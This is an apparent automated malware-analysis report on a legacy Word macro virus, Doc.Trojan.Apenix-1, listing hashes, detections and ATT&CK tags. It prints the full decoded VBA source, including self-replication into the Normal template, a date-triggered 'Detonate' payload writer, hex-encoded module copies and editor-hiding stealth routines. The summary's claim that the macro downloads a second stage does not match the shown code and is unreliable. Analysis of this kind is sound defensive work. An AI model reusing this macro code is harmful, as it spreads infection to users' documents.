Doc.Trojan.Apenix-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 bbc1299d1699f9da…

MALICIOUS

Office (OLE)

40.0 KB Created: 2002-08-22 02:47:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: c66e086ef9d15d1e798f85c86b8d9afc SHA-1: e0f0a95bd56b6078af97a88249a9d652de7c1d78 SHA-256: bbc1299d1699f9da68a7d6fc34557ecf6c232567decee18d7adfb04dd4a77878
188 Risk Score

Malware Insights

Doc.Trojan.Apenix-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic macro markers and a critical ClamAV detection for 'Doc.Trojan.Apenix-1'. The AutoClose macro attempts to create a batch file 'c:\aut0exec.bat' and then executes a payload via the 'Detonate' subroutine, which writes to 'c:\command.c0m'. This indicates the macro's primary function is to download and execute a second-stage payload.

Heuristics 4

  • ClamAV: Doc.Trojan.Apenix-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Apenix-1
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7424 bytes
SHA-256: d1fd88147ecc0049da148c3130e7b643c7945ac174bf8b252dc4ce92eecd6d79
Detection
ClamAV: Doc.Trojan.Apenix-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "vir"
Const apndx = "apendix": Private a As Byte: Private flag As Boolean
Sub AutoClose()
Open "c:\aut0exec.bat" For Binary Access Write As #1: Close #1
If FileLen("c:\aut0exec.bat") = 2 Then
del ActiveDocument, "cnsts": del ActiveDocument, "vir": Options.VirusProtection = True
End
End If
timer
flag = True
For i = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents.Item(i).Name = "norm" Then flag = False
Next i
If flag Then c
End Sub
Sub del(a As Object, n As String)
 For i = 1 To a.VBProject.VBComponents.Count: If a.VBProject.VBComponents.Item(i).Name = n Then a.VBProject.VBComponents.Remove a.VBProject.VBComponents.Item(i)
Next i
End Sub
Sub ex(s As String, ap As String): Open ap For Binary Access Write As #1: For i = 1 To Len(s) - 1 Step 2: a1 = AscB(Mid(s, i, 1)) - 48: a2 = AscB(Mid(s, i + 1, 1)) - 48: a = a1 * 16 + a2: Put #1, , a: Next: Close #1
End Sub
Sub c()
ex cnsts.n, apndx
NormalTemplate.VBProject.VBComponents.import apndx
ActiveDocument.VBProject.VBComponents("cnsts").export apndx
NormalTemplate.VBProject.VBComponents.import apndx
NormalTemplate.Save
Kill apndx
End Sub
Sub timer(): If Date > #12/25/2001# And Date < #12/30/2001# Then Detonate
If Date > #2/22/2002# And Date < #2/26/2002# Then Detonate
End Sub
Sub Detonate(): vir.im ";80102;90100;:80001>07;;2<01<=13<684<20107<684=20107;80103;90100;:80001>07;;2<01<=13<=2000", "c:\command.c0m"
End Sub

Attribute VB_Name = "cnsts"
Public Const n = "4174747269627574652056425?4>616=65203=20226>6?726=220=0:436?6>737420766972203=2022766972220=0:5072697661746520613320417320427974650=0:537562204175746?4?70656>28290=0:4?70656>2022633:5<61757430657865632>6261742220466?722042696>617279204163636573732057726974652041732023313:20436<6?73652023310=0:49662046696<654<656>2822633:5<61757430657865632>6261742229203=2032205468656>0=0:64656<204>6?726=616<54656=706<6174652<2022636>737473223:2064656<204>6?726=616<54656=706<6174652<20226>6?726=223:204?7074696?6>732>566972757350726?74656374696?6>203=20547275650=0:456>640" + _
"=0:456>642049660=0:4?7074696?6>732>566972757350726?74656374696?6>203=2046616<73650=0:466?722045616368206465737420496>20446?63756=656>74730=0:666<6167203=20547275650=0:466?722069203=203120546?20646573742>564250726?6:6563742>5642436?6=706?6>656>74732>436?756>740=0:496620646573742>564250726?6:6563742>5642436?6=706?6>656>74732>4974656=2869292>4>616=65203=20766972205?0=0:5468656>20666<6167203=2046616<73650=0:4>65787420690=0:496620666<6167205468656>0=0:657820636>737" + _
"4732>762<207669720=0:646573742>564250726?6:6563742>5642436?6=706?6>656>74732>696=706?7274207669720=0:4>6?726=616<54656=706<6174652>564250726?6:6563742>5642436?6=706?6>656>74732822636>73747322292>6578706?7274207669720=0:646573742>564250726?6:6563742>5642436?6=706?6>656>74732>696=706?7274207669720=0:4;696<6<207669720=0:456>642049660=0:4>65787420646573740=0:446?63756=656>74732>5361766520547275652<207764576?7264446?63756=656>740=0:456>64205375620=0:537562206578287320417320537472696>672<20617020417320537472696>67293:204?70656>20617020466?722042696>617279204163636573732057726974652041732023313:20466?722069203=203120546?204<656>287329202=2031205374657020323:206131203=2041736342284=696428732<20692<20312929202=2034383:206132203=2041736342284=696428732<2069202;20312<20312929202=2034383:206133203=206131202:203136202;2061323:205075742023312<202<2061333:204>6578743:20436<6?73652023310=0:456>64205375620=0:5375622064656<" + _
"2861204173204?626:6563742<206>20417320537472696>67290=0:20466?722069203=203120546?20612>564250726?6:6563742>5642436?6=706?6>656>74732>436?756>743:20496620612>564250726?6:6563742>5642436?6=706?6>656>74732>4974656=2869292>4>616=65203=206>205468656>20612>564250726?6:6563742>5642436?6=706?6>656>74732>52656=6?766520612>564250726?6:6563742>5642436?6=706?6>656>74732>4974656=2869290=0:4>65787420690=0:456>64205375620=0:"
Public Const v = "4174747269627574652056425?4>616=65203=2022766972220=0:436?6>73742061706>6478203=20226170656>646978223:2050726976617465206120417320427974653:205072697661746520666<616720417320426?6?6<65616>0=0:537562204175746?436<6?736528290=0:4?70656>2022633:5<61757430657865632>6261742220466?722042696>617279204163636573732057726974652041732023313:20436<6?73652023310=0:49662046696<654<656>2822633:5<61757430657865632>6261742229203=2032205468656>0=0:64656<20416374697665446?63756=656>742<2022636>737473223:2064656<20416374697665446?63756=656>742<2022766972223:204?7074696?6>732>566972757350726?74656374696?6>203=20547275650=0:456>640=0:456>642049660=0:74696=65720=0:666<6167203=20547275650=0:466?722069203=203120546?204>6?726=616<54656=706<6174652>564250726?6:6563742>5642436?6=706?6>656>74732>436?756>740=0:4966204>6?726=616<54656=706<6174652>564250726?6:6563742>5642436?6=706?6>656>74732>4974656=2869292>4>616=65203=20226>6?726=22205468656>20666<6167203=2046616<73650" + _
"=0:4>65787420690=0:496620666<6167205468656>20630=0:456>64205375620=0:5375622064656<2861204173204?626:6563742<206>20417320537472696>67290=0:20466?722069203=203120546?20612>564250726?6:6563742>5642436?" + _
"6=706?6>656>74732>436?756>743:20496620612>564250726?6:6563742>5642436?6=706?6>656>74732>4974656=2869292>4>616=65203=206>205468656>20612>564250726?6:6563742>5642436?6=706?6>656>74732>52656=6?766520612>564250726?6:6563742>5642436?6=706?6>656>74732>4974656=2869290=0:4>65787420690=0:456>64205375620=0:537562206578287320417320537472696>672<20617020417320537472696>67293:204?70656>20617020466?722042696>617279204163636573732057726974652041732023313:20466?722069203=203120546?204<656>287329202=2031205374657020323:206131203=2041736342284=696428732<20692<20312929202=2034383:206132203=2041736342284=696428732<2069202;20312<20312929202=2034383:2061203=206131202:203136202;2061323:205075742023312<202<20613:204>6578743:20436<6?73652023310=0:456>64205375620=0:537562206328290=0:657820636>7374732>6>2<2061706>64780=0:4>6?726=616<54656=706<6174652>564250726?6:6563742>5642436?6=706?6>656>74732>696=706?7274" + _
"2061706>64780=0:416374697665446?63756=656>742>564250726?6:6563742>5642436?6=706?6>656>74732822636>73747322292>6578706?72742061706>64780=0:4>6?726=616<54656=706<6174652>564250726?6:6563742>5642436?6=706?6>656>74732>696=706?72742061706>64780=0:4>6?726=616<54656=706<6174652>536176650=0:4;696<6<2061706>64780=0:456>64205375620=0:5375622074696=657228293:2049662044617465203>202331322?32352?323030312320416>642044617465203<202331322?33302?3230303123205468656>204465746?6>6174650=0:49662044617465203>2023322?32322?323030322320416>642044617465203<2023322?32362?3230303223205468656>204465746?6>6174650=0:456>64205375620=0:537562204465746?6>61746528293:207669722>696=20223;38303130323;39303130303;3:38303030313>30373;3;323<30313<3=31333<3638343<32303130373<3638343=32303130373;38303130333;39303130303;3:38303030313>30373;3;323<30313<3=31333<3=32303030222<2022633:5<636?6=6=616>642>63306=220=0:456>64205375620=0:"
Sub ViewVBCode(): Stealth
End Sub
Sub ToolsMacro(): Stealth
End Sub
Sub FileTemplates(): Stealth
End Sub
Private Sub Stealth(): On Error Resume Next
Application.ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.